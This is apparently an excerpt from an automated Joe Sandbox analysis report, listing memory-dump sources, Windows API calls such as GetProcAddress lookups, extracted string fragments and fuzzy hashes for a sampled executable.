                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 67617075ff6492bbdc986732f8a5c15cfdde618040dc6e2dde4b910c088be647
                                                                                                                                                                                                                                        • Instruction ID: fe9f1ac07d5ad247747b8598201a676104a9a69f0d2a162efe987a3e79c24903
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67617075ff6492bbdc986732f8a5c15cfdde618040dc6e2dde4b910c088be647
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BD06C3200010DBBDF029F84DC06EDA3BAAFB48714F014100FA1856020C732E861AB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00191816
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00191824
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00191835
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00191846
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00191857
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00191868
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00191879
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0019188A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0019189B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001918AC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001918BD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001918CE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001918DF
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001918F0
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00191901
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00191912
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00191923
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00191934
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00191945
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00191956
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00191967
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00191978
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00191989
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0019199A
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 001919AB
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001919BC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001919CD
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001919DE
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001919EF
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00191A00
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00191A11
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00191A22
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00191A33
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00191A44
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00191A55
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00191A66
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00191A77
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00191A88
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00191A99
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00191AAA
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00191ABB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 667068680-295688737
                                                                                                                                                                                                                                        • Opcode ID: 39c708a417b3a52a478662831ea5122c42cdfceb9abd650aa372f135d95f84bd
                                                                                                                                                                                                                                        • Instruction ID: 893946d001d4aca4fce2c5acdc9d1181225f4cd7e449b03beab6ada72694687e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39c708a417b3a52a478662831ea5122c42cdfceb9abd650aa372f135d95f84bd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F619AB2992310EBD7016FB4AE0DE973FE8AB8DB067044656F249D29A1D7B480C1CFD0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 'NYc$(NYc$(NYc$(NYc$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$6U;$$6U;$
                                                                                                                                                                                                                                        • API String ID: 0-2498968977
                                                                                                                                                                                                                                        • Opcode ID: 5fe01e1edc2465eafa47f8d766d4d3fb1fae66ade0f7d06419d3d70ec3584966
                                                                                                                                                                                                                                        • Instruction ID: 5a3b1f2e0065b84605468d3bf5b9e5d3b864f504d8c1bdb0437ea2bf2bbf3e83
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fe01e1edc2465eafa47f8d766d4d3fb1fae66ade0f7d06419d3d70ec3584966
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3324A367083014FCB18CE28C4D16AE7BE2ABD5354F19D92DF89AD7260DB35CD468B82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *<($*<($K5<$K5<$K5<$L5<$L5<$X|Go$X|Go$[+]: %P$qxT+$qxT+$qxT+$qxT+$rxT+$rxT+
                                                                                                                                                                                                                                        • API String ID: 0-661926131
                                                                                                                                                                                                                                        • Opcode ID: cdd1cfd638bed6e71074e407f1f171b691a9e294dfb71532468a8ded6b9e8815
                                                                                                                                                                                                                                        • Instruction ID: 3378e8611a6cf44e5c238ae65c7bd578be3685c9bc2720c235a697cd62b1ee1d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cdd1cfd638bed6e71074e407f1f171b691a9e294dfb71532468a8ded6b9e8815
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DA226366087408FDB28CA28C8D57EE77E2ABD5350F24C92EE89DC7355D735C9868B42
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,A;$,A;$,A;$,A;$-A;$-A;$yHP$yHP$yHP
                                                                                                                                                                                                                                        • API String ID: 0-674415475
                                                                                                                                                                                                                                        • Opcode ID: 08d3d97d998165a420f758ad4950f9df06a5d12b10cd230cbb1c91c831b2324c
                                                                                                                                                                                                                                        • Instruction ID: c84cdede57f6f8d6657a5075b1a6a371c6259646409da1353caf8917865ad7d8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d3d97d998165a420f758ad4950f9df06a5d12b10cd230cbb1c91c831b2324c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9D18C2A7143024FDB1895785CE52EF37C39F96750F29853ED822CB6A1E725CE8A8F41
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0018BD9E
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0018BE78
                                                                                                                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0018BF73
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                                                                                                                        • String ID: "5M"$"5M"$"5M"$ZiP\$[iP\$[iP\$[iP\$[iP\
                                                                                                                                                                                                                                        • API String ID: 2659868963-1964655981
                                                                                                                                                                                                                                        • Opcode ID: 618bedbd7a451228359cd12329892bc8739da7034323e6756fbf69dc9dd1713d
                                                                                                                                                                                                                                        • Instruction ID: 33788024cf001f9597d520521d79522f46d7ac6eb9fbf3b6fe8f9a0ae8795f5b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 618bedbd7a451228359cd12329892bc8739da7034323e6756fbf69dc9dd1713d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C291683A210B024FD714CA358CE63DB77E69B96314F65C92EE859CB2A0DB39D94D8F40
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: W$W$W$3aB$3aB$hs$is$is$is$is
                                                                                                                                                                                                                                        • API String ID: 0-4166734425
                                                                                                                                                                                                                                        • Opcode ID: ec91d4c0decdaccdb05327e31d975c6b03da7c03e932488b51677cbc78c8df73
                                                                                                                                                                                                                                        • Instruction ID: cdfb6de51e668d97a97c3760c38a6b9c51f2f2daa6ba5a858905f7162033401b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec91d4c0decdaccdb05327e31d975c6b03da7c03e932488b51677cbc78c8df73
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 761338367046408FDB28CA2888D57AF77E2AFD5310F25892DE899C7365DB35CD4A8F42
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: >N/s$>N/s$>N/s$>N/s
                                                                                                                                                                                                                                        • API String ID: 0-1138143547
                                                                                                                                                                                                                                        • Opcode ID: 95ed39e1494002cf910692147b949be0ede864505fb3eddfa6060e1984fb5409
                                                                                                                                                                                                                                        • Instruction ID: d7bfe30868c94cb78686bb241ce00fbbb8b3ac7d3c2752131b4924aa47885e25
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95ed39e1494002cf910692147b949be0ede864505fb3eddfa6060e1984fb5409
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50912876B401024BCF18896998D56FFB7B39BD4314F79D916E409CB364EB2ACC868F42
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: !O<$"O<$"O<
                                                                                                                                                                                                                                        • API String ID: 0-57260185
                                                                                                                                                                                                                                        • Opcode ID: f34a18fc7b448281cfa1a952b283ed067c17d355ead90806ea9b4677c5bb946a
                                                                                                                                                                                                                                        • Instruction ID: 6302b05d0c2213d73f86c6215f13cdc991d49d412dd02d01d18e4392a789897d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f34a18fc7b448281cfa1a952b283ed067c17d355ead90806ea9b4677c5bb946a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF214357083408FCB28DA2888957AE7BE2AFD5314F68891DE899C7395DB35CD46CF42
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 00185FB6
                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0018624C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task_strlen
                                                                                                                                                                                                                                        • String ID: hOLK$hOLK$hOLK$hOLK
                                                                                                                                                                                                                                        • API String ID: 575380510-348066219
                                                                                                                                                                                                                                        • Opcode ID: e6a145ea70f26ddf871181109284ae13506fc8edb03ac05604a8c6b39b381e02
                                                                                                                                                                                                                                        • Instruction ID: ad2c97b918075498fd29b9fd882d976327fb8f5e7d838f64727a69eb7f2f4728
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6a145ea70f26ddf871181109284ae13506fc8edb03ac05604a8c6b39b381e02
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B651483A758700CFCB14AE1CC88426FB3E3EBE5714F6B441AE95587222DB318E459F82
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                        • Opcode ID: 0eb875fd5673ee3356ca42da450a19107dec754301bc32d6a60651a0f8293159
                                                                                                                                                                                                                                        • Instruction ID: a5eda3b4c0ca7a1a05334bfc826e38ae04600472d7de62548e9cbd3c247923ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0eb875fd5673ee3356ca42da450a19107dec754301bc32d6a60651a0f8293159
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65D24875E082288FDB64CE28DD847EAB7B5FB45305F1541EAD40DE7241EB78AE858F80
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 5r$$5r$$5r$$5r$$5r$$5r$$5r$
                                                                                                                                                                                                                                        • API String ID: 0-2049126361
                                                                                                                                                                                                                                        • Opcode ID: c90018b789811c309f7f724136c7c647381ec3c49a63c5ed2a728c58052bee48
                                                                                                                                                                                                                                        • Instruction ID: cb164c8d021d7876c967cf5f80f28a4700b74ee6e6961f89da493e8f20f3c83f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c90018b789811c309f7f724136c7c647381ec3c49a63c5ed2a728c58052bee48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9961BC37B59B154F8B18D93A88C13AB73E357D4324F1BC62AC95DD3318DA7ACC815682
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,001A4D1D,00000002,00000000,?,?,?,001A4D1D,?,00000000), ref: 001A5400
